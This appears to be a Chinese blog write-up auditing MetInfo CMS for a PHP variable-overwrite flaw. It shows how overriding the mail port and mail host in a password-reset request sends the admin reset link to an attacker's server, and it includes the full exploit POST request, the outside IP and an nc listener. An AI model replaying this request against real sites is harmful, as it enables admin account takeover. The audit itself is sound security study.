PHP审计-实战变量覆盖漏洞

简介: PHP审计-实战变量覆盖漏洞
+关注继续查看

image

/include/common.inc.php

下面代码 用以将传入的cookie、get、post参数进行变量赋值

image

密码重置

MetInfo有管理员密码重置的功能,此功能由于变量覆盖导致可以获取密码重置链接。

640.png

密码文件

admin/admin/getpassword.php

switch语句开始是密码找回的逻辑控制语句

第一步选择密码找回的方式,默认是邮件找回,然后第二步,主要从92行开始执行,前面一大段是拼接数据包的语句,从第143行开始发送邮件

image

image


如果jmailsend函数发送失败则进入下面的if语句使用curl_post发送,进入curl_post函数

include/export.func.php

image

$post是未能成功发送的邮件内容,然后根据$met_host指定的地址将邮件内容发送过去,$met_host 在程序的值指定为app.metinfo.cn,应该是metinfo官方设置的邮件转发服务器,当站长自身设置的邮件服务器不起作用时先将邮件内容通过http请求发送此服务器,再由此服务器发送密码重置邮件。但是这个$met_host的值由于变量覆盖的原因导致可以被任意设置,可以将密码重置邮件的内容发送到我们指定的服务器。

前提是jmailsend发送失败,这里再来看一下jmailsend函数,在文件/include/jmail.php中。

640.png

目的是使这个函数返回False,这里同样使用变量覆盖的方式加以利用,可以看到根据$met_fd_port指定的端口发送邮件,这里如果将这个变量覆盖掉将导致邮件发送失败。首先在服务器上设置监听端口,curl_post默认80端口

640.png

抓包

POST /Metinfo/admin/admin/getpassword.php HTTP/1.1
Host: 192.168.5.22
Content-Length: 84
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.5.22
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 FS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.5.22/Metinfo/admin/admin/getpassword.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=96tlnqee9e5cs5b56m7r80g1n5; recordurl=%2Chttp%253A%252F%252F192.168.5.22%252FMetinfo%252F%2Chttp%253A%252F%252F192.168.5.22%252FMetinfo%252Fproduct%252Fshowproduct.php%253Flang%253Dcn%2526id%253D13%2Chttp%253A%252F%252F192.168.5.22%252FMetinfo%252F%2Chttp%253A%252F%252F192.168.5.22%252FMetinfo%252Fdownload%252Fdownload.php%253Flang%253Dcn%2526class2%253D35%2Chttp%253A%252F%252F192.168.5.22%252FMetinfo%252Fabout%252Fshow.php%253Flang%253Dcn%2526id%253D19%2Chttp%253A%252F%252F192.168.5.22%252FMetinfo%252F
Connection: close

action=next2&abt_type=2&admin_mobile=123%40qq.com&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5&met_fd_port=400&met_host=120.25.205.228

vps开启nc监听80端口

image

http://192.168.5.22/Metinfo/admin/admin/getpassword.php?p=049dasw1rDxmWjwtuI80IOc%2BHW5WazEtXovdX58kVCfXwwwoJY6x3cB7%2BOdSJvaDy2P17ELfwCu2lcQE1bjctzmvvA

image

相关文章
|
2月前
|
SQL 安全 JavaScript
跨站脚本攻击 (XSS)和SQL注入漏洞php排查解决方案
跨站脚本攻击 (XSS)和SQL注入漏洞php排查解决方案
46 0
|
4月前
|
安全 PHP
|
4月前
|
存储 SQL 缓存
干货 | PHP反序列化原理及不同类别反序列化漏洞总结
干货 | PHP反序列化原理及不同类别反序列化漏洞总结
81 0
|
4月前
|
安全 PHP
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
69 0
|
5月前
|
Web App开发 Rust 安全
解雇拒绝打开摄像头员工被罚 51 万;推送损坏的更新,导致数千网站瘫痪;PHP 存在不受控制的递归漏洞|思否周刊
解雇拒绝打开摄像头员工被罚 51 万;推送损坏的更新,导致数千网站瘫痪;PHP 存在不受控制的递归漏洞|思否周刊
|
7月前
|
存储 安全 PHP
PHP反序列化漏洞
PHP反序列化漏洞
52 0
PHP反序列化漏洞
|
7月前
|
安全 关系型数据库 MySQL
某教程学习笔记(一):17、php漏洞
某教程学习笔记(一):17、php漏洞
47 0
某教程学习笔记(一):17、php漏洞
|
9月前
|
安全 PHP
CVE-2018-7490 uWSGI PHP目录穿越漏洞
CVE-2018-7490 uWSGI PHP目录穿越漏洞
303 0
CVE-2018-7490 uWSGI PHP目录穿越漏洞
|
11月前
|
安全 Shell PHP
详解PHP代码执行漏洞--无字母shell
代码执行漏洞无字母shell讲解
117 0
详解PHP代码执行漏洞--无字母shell
|
11月前
|
安全 网络安全 PHP
【网络安全篇】php伪协议-漏洞及其原理
🏆今日学习目标: 🍀学习php伪协议
196 0
【网络安全篇】php伪协议-漏洞及其原理
推荐文章
更多